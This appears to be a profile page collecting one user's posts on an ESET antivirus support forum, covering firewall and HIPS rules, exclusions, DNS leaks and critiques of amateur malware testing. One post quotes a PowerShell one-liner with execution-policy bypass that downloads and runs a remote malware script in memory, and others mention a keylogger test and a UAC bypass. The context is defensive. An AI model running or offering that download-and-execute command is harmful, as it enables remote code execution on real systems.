itman
-
Posts
12,197 -
Joined
-
Last visited
-
Days Won
320
Posts posted by itman
-
-
As far as DNS leakage is concerned, you should perform one of the web leak test such as: http://dnsleak.com/ to ensure your VPN provider is not the source of the leak.
-
2 hours ago, Kate978 said:
This initialization window with ESET logo is also missing.
If you are using Win 10's fast startup option, the logo screen won't show at boot time. It does appear after a system restart.
-
I haven't used Eset's Policy modes for either firewall or HIPS settings. However, policy mode in other security software usually means only rule based "allow" activity and everything else is blocked by default. Or using an expanded definition, only allow and block rules are permitted. The concept of "ask" rules/activity falls in the scope of interactive monitoring. For example, an ask rule by definition will offer a user the option to manually create a rule. This by definition violates the concept of employing a fixed policy.
-
1 hour ago, Rami said:
I guess that if you password protect your settings in ESET it will prompt you to put your password once you try to uninstall it, it's my guessing , I don't know I might be wrong , correct me if I am wrong
Actually, its much more restrictive. Any Eset GUI access requires the password to be entered. One reason why I don't use the option.
-
27 minutes ago, TomFace said:
As Marcos said, the feature in not available in all countries.
Well, the option shows in the Dutch language versions. So I assume it is available in the Netherlands.
-
I just noticed something. Both OP and @Moriseif are running Win 8.1. Why this would manifest on that OS ver. I have no clue.
-
52 minutes ago, britneysmith77 said:
I uninstalled my previous version and I reinstalled the one that was on the link in my email
that contained my product key
Who was the e-mail from? Post a copy of the download link in the e-mail using hxxp or hxxps prefix.
One possible issue is that Eset licenses are country specific.
-
49 minutes ago, Kate978 said:
Custom rules are configured in such way that all incoming connections are blocked and all outgoing connections are asked.
Post a screen shot of your existing firewall rules; just one that shows the beginning of the default Eset rules.
-
Here's a recent posting on the Malwarebytes forum where an Avast user was having similar issues: https://forums.malwarebytes.com/topic/241898-avast-service-high-cpu-and-malwarebytes-web-protection/ . Appears they recently updated MBAM which appears to have resolved that issue. So you might want to try to do the same.
The bottom line is MBAM 3.x is conflicting with a lot of other AV solutions. You should never be running more than one AV in realtime mode. It is recommended that MBAM realtime scanning be disabled and only used a second opinion on-demand scanner.
-
To excluded a file from Realtime scanning, you enter the item in the "Exclusions" section in Eset GUI Real-time file system protection section. Click on the gear symbol and select "Edit exclusions." As far as selection criteria goes:
QuoteExamples
•If you wish to exclude all files in a folder, type the path to the folder and use the mask “*.*”.
•To exclude an entire drive including all files and subfolders, use the mask "D:\*".
•If you want to exclude doc files only, use the mask “*.doc“.
•If the name of an executable file has a certain number of characters (and characters vary) and you only know the first one for sure (say “D”), use the following format: “D????.exe”. Question marks replace the missing (unknown) characters.
-
Strange. The IP address, 23.45.65.31, is Akamai.
-
My Internet Security license will be expiring soon.
I have purchased a license for Smart Security. Would like to experiment with the password manager feature. I have extensive custom settings for Internet Security and do not want to manually reenter all of them into Smart Security. If EIS Import is not possible into Smart Security, I will just stick with Internet Security.
Also, I have seen registry settings related to ESS on my EIS build. Is there anyway to convert my existing EIS install to ESS without removing EIS and installing ESS?
-
Also, best wishes on speedy recovery .
-
16 hours ago, Tyfox said:
microsoft edge is annoying ccleaner says it cant clean parts of it.
You need to get help on this at the CCleaner forum: https://forum.piriform.com/forum/4-ccleaner-discussion/
-
According to Fortinet which does annual threat landscape reporting, the "hands down winner" is exploits:
QuoteUnderstanding exploit trends or how ransomware works and spreads, the better we can avoid the impact caused by the next WannaCry. The malicious ransomware and its variants achieved great scale with hundreds of organizations affected across the world at once.
- Ransomware: Just under 10% of organizations detected activity associated with ransomware. On any given day, an average of 1.2% dealt with ransomware botnets running somewhere in their environment. The peak days of activity fell on weekends, with the hope of slipping traffic past weekend security operations staff. As the average traffic volume of various ransomware botnets increased, the average number of firms impacted by them rose as well.
- Exploit Trends: 80% of organizations reported high or critical-severity exploits against their systems. The majority of these targeted vulnerabilities were released in the last five years, but no shortage of attempts was made against premillennial CVEs. Exploit distribution was pretty consistent across geographical regions, likely because a huge proportion of exploit activity is fully automated via tools that methodically scan wide swaths of the Internet probing for opportunistic openings.
Therefore one's number one security priority should be ensuring all their devices have applied all available OS and app software patches as soon as they are available.
-
1 hour ago, Euan_Clark__ said:
My ESET antivirus has seemingly uninstalled itself, it doesn't show up in the hidden icons tray and I can't find the ESET GUI anywhere
Using Windows task manager, verify if these two processes are running; Eset service and Eset Main GUI. Appears some type of corruption may have occurred to the Eset GUI process, equi.exe, and it terminated itself. Did you try a reboot to see if the Eset GUI reestablishes itself as a desktop toolbar icon?
Also if Eset was totally disabled/removed, Windows Defender should now be running in realtime mode? Is that the case?
-
One of the main problems with amateur malware testers is their testing of malware samples outside of the context by which they are actually deployed. For example if one wants to test a security product's capability to protect against fileless ransomware delivered via remote execution, they need to run:
QuoteLoading scripts directly in memory
An attacker can perform remote execution of a script by directly executing it in memory to bypass endpoint security. Here is a command line example that uses the DownloadString method to download content from a remote location to a buffer in memory:
powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient).DownloadString(‘https://[website]/malware.ps1′))
The purpose of the “Bypass” parameter is to bypass execution policies so that administrators can remotely execute commands. However, attackers can also use the same parameter to bypass security. Because using this parameter doesn’t result in any configuration change, it’s a common target to bypass.
Of course, they also need something locally to allow for the startup of powershell.exe remotely which frequently is the backdoor components of PowerSploit: https://attack.mitre.org/software/S0194/
-EDIT- Also in the above McAfee remote execution of PowerShell example, detecting, blocking, and cleaning the script ransomware code from memory stops the ransomware from executing. Powershell.exe would still be running but would not be executing anything.
It is also a good idea to create a firewall rule to block all outbound traffic from powershell.exe.
-
I ran another test employing PowerShell the way the script should have been tested.
First, I temporarily excluded my keylogger script from detection by Eset realtime scanning so I could copy it to the clipboard. I then fired up PowerShell ISE and copied the keylogger code to it. Finally, I ran the code as a script from PowerShell ISE:
As the above screen shot shows, the script was not allowed to run due to detection of malicious content by Eset. Initially I did not get an alert from Eset. Appears Eset won't show it until all corrective action has been completed. However, the Eset Detected Threats log shows Eset first detected malicious code prior to script file creation via AMSI scanning:
Next Eset blocked creation of the script in an AppData folder:
Overall, a very good showing of Eset PowerShell script protection.
Oh, the minute I tried to access the script folder containing my original keylogger script, Eset deleted that:
-
My "memory returned" in regards to cleamgr.exe use of dismhost.exe. As I recollect, cleanmger.exe actual runs dismhost.exe as a shell process from dism.exe. It is therefore imperative when creating user HIPS rules to pay attention to what is shown on the command line shown in the Eset alert.
As I stated previous, I don't have any rules created specifically for dismhost.exe. Additionally it can be run under certain situations in regards to "sfc.exe /scannow" command line and compattelrunner.exe execution to name a few legit Windows processes. Unfortunately dismhost.exe running in the context of cleanmgr.exe has been used maliciously in the past: https://threatpost.com/windows-uac-bypass-leaves-systems-open-to-malicious-dlls/119468/ and https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ . The same is true for other legit Windows processes. It is therefore imperative that one always runs UAC at its highest level which will thwart most of these UAC bypasses. Unfortunately, this dismhost.exe UAC bypass was not one them.
-
I will also add there is a bit of "misguided trickery" in the this PowerShell video.
I have used in the past a .Net based PowerShell global keylogger script that Eset now detects as malicious. I restored the script from Eset's Quarantine. I then attempted to Edit the script. This in turn caused Powershell ISE to load. It in turn tried to load the PowerShell script for editing. I immediately got an alert from Eset that malware was detected upon attempted file access to the script:
Additionally, Eset blocked the attempt by PowerShell to access the script:
-
Hum …………. Here we go again!
Your video clearly shows Eset detecting the PowerShell based ransomware when run as designed and frequently done via the command shell interface.
You then open the PowerShell GUI interface and run the unpacked/unobfuscated/decrypted script. You wonder why Eset couldn't stop the ransomware running under PowerShell although it detected it in memory. The simple answer is because you manually started PowerShell GUI interface. As such Eset won't terminate it since it is viewed as legit system activity. Eset is designed to detect PowerShell based malware as it deployed "in the wild." That is when its malicious execution is attempted via external startup means.
The only way an attacker could duplicate what you did is if he logged on a device remotely and then started, as you did, the PowerShell GUI. The only way this would go unnoticed is if the PC was unattended. Finally if the attacker could gain remote access, he could have just unloaded all the target device's files and deleted them afterwards on the target device.
If you are going to perform malware testing, please do so properly.
-
9 hours ago, Moneesh said:
As of now, as per your suggestion i have installed trial version of Eset Internet Security 12.0.31.0 (still 25 days left
Make sure you create an Eset firewall to block outbound C:\Windows\SysWOW64\dllhost.exe traffic as you did for the Win firewall. Set the logging level to warning. Then periodically monitor the Eset Networking log for any entries related to dllhost.exe. If no log entries appear after a few days, then we can safely assume the TinukeBot trojan has been removed.
You need to create the Eset firewall rule since Eset disables the Win firewall.
-
I have a HIPS rule that monitors all process startups in %Appdata% directories. The only process that I allow via specific HIPS rule to do so is cleanmgr.exe. Windows has a scheduled task that runs cleanmgr.exe periodically; i.e. SilentCleanup. Cleanmgr.exe in turn runs dismhost.exe. I have no specific HIPS rules for dismhost.exe. To my best knowledge, the HIPS by default allows all child processes if the parent process is allowed.
If you are receiving alerts on dismhost.exe, you must have created a HIPS rule previously to do so.
Note that if you are going to create user HIPS rules, it is up to you to monitor that they are being correctly applied and functioning as you expect. Eset doesn't encourage users to create HIPS rules. As such, you will only receive minimal support in this regard from Eset.
-EDIT- If you see dismhost.exe running frequently, it is indicative of possible Win OS issues. You can Google on "dismhost.exe" about this.
-
Awaiting detail analysis of your logs by Eset once you submit them, it appears that explorer.exe is not the legit Windows one or malware is injecting malicious code into it.
Explorer.exe is connecting to IP address,212.47.229.211. This IP address is associated with a legit but low reputation ISP, SAS Online, located in Paris, France. Since you are located in Pakistan, I assume that is not the ISP you are using? Appears Eset is interpreting this as botnet activity and terminating the source which in this case is explorer.exe.
To begin with, I would submit C:\Windows\explorer.exe to VirusTotal for a scan and see if a majority of the AV scanners there label it as malware.
I can't see "Refer your friend" button!
in ESET Internet Security & ESET Smart Security Premium
Posted
I have a solution to this issue.
Drop the GUI referral option altogether. Return to the prior e-mail based referral option as done in the past: https://www.dmnews.com/channel-marketing/social/news/13059759/eset-deploys-forwardtoafriend-emails-to-boost-sales-and-customer-acquisition which is less likely to be abused. Also, the forum won't be cluttered up with never ending postings about the issue.